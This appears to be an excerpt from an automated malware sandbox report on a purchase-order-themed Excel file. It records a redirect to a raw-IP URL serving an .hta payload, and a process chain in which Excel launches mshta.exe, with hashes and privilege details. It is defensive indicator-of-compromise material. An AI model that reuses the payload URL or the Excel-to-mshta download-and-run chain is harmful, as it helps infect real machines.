                  Data Ascii: Found. Redirecting to http://192.3.27.144/250/gse/begoodforeverythinggreatthingsformebetterforgood.hta


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:03:54:51
                  Start date:08/01/2025
                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                  Imagebase:0xd50000
                  File size:53'161'064 bytes
                  MD5 hash:4A871771235598812032C822E6F68F19
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:5
                  Start time:03:55:50
                  Start date:08/01/2025
                  Path:C:\Windows\SysWOW64\mshta.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\mshta.exe -Embedding
                  Imagebase:0x6c0000
                  File size:13'312 bytes
                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:false

                  Target ID:7
                  Start time:03:55:54
                  Start date:08/01/2025
                  Path:C:\Windows\splwow64.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\splwow64.exe 12288
                  Imagebase:0x7ff6b09c0000
                  File size:163'840 bytes
                  MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:10
                  Start time:03:56:10
                  Start date:08/01/2025
                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#3311-20250108003.xls"
                  Imagebase:0xd50000
                  File size:53'161'064 bytes
                  MD5 hash:4A871771235598812032C822E6F68F19
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  No disassembly